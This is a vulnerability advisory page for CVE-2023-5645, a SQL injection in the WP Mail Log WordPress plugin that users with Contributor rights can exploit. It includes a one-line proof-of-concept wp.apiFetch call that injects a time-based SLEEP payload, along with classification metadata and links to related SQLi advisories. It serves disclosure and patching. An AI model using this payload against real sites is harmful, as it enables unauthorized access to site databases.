WP Mail Log < 1.1.3 – Contributor+ SQL Injection in wml_logs endpoint | CVE 2023-5645 | Plugin Vulnerabilities

Description

The plugin does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by users with a role as low as Contributor.

Proof of Concept

Run the following within a block editor page. Notice that the request is delayed by the SLEEP call in the injected SQL.

await wp.apiFetch({path: 'wml/v1/wml_logs', method: 'POST', data: {pageSize: 10, filter: {1: {key: '1=(SELECT IF(1=1,SLEEP(10),\'a\')))#', operator: '', value: ''}}}});

Affects Plugins

Fixed in 1.1.3

References

CVE

Classification

Type

SQLI

OWASP top 10

CWE

CVSS

Miscellaneous

Original Researcher

dc11

Submitter

dc11

Verified

Yes

WPVDB ID

e392fb53-66e9-4c43-9e4f-f4ea7c561551

Timeline

Publicly Published

2023-11-28 (about 2 years ago)

Added

2023-11-28 (about 2 years ago)

Last Updated

2023-11-28 (about 2 years ago)

Other

Published

Title

Published

2022-12-12

Title

WP AutoComplete Search <= 1.0.4 - Unauthenticated SQLi

Published

2025-01-24

Title

RSVP and Event Management Plugin < 2.7.15 - Authenticated (Administrator+) SQL Injection

Published

2024-06-20

Title

Icegram Express - Email Subscribers, Newsletters and Marketing Automation Plugin < 5.7.24 - Unauthenticated SQL Injection via optin

Published

2024-05-31

Title

wpDataTables - Tables & Table Charts (Premium) < 6.3.2 - Unauthenticated SQL Injection

Published

2017-06-11

Title

WP Jobs <= 1.4 - Authenticated SQL Injection